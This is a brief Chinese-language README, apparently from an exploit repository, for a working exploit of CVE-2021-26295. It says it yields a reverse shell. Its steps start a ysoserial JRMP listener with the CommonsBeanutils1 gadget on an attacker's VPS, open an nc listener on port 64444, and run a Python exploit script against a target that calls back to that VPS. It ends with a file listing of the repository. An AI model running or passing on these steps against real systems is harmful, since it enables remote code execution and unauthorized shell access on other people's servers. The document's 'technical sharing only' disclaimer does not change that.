CVE-2021-26295 EXP 可成功反弹Shell# CVE-2021-26295
**CVE-2021-26295 EXP 可成功反弹Shell**
> **本文以及工具仅限技术分享,严禁用于非法用途,否则产生的一切后果自行承担。**
### 触发命令执行EXP
#### 1. VPS启动`RMI`监听 `9999` 端口
```shell
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[要执行的命令]'
```
#### 2. VPS启动`nc`监听 `64444` 端口
```shell
nc -lvp 64444
```
#### 3. 执行python脚本
```shell
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>
```
#### 示例


[4.0K] /data/pocs/0c0cd8917bb51ad19663141fdf240e46747b5d48
├── [2.5K] cve-2021-26295_exp.py
├── [4.0K] img
│ ├── [ 40K] 1616580076993.png
│ └── [158K] 1616580247015.png
└── [ 635] README.md
1 directory, 4 files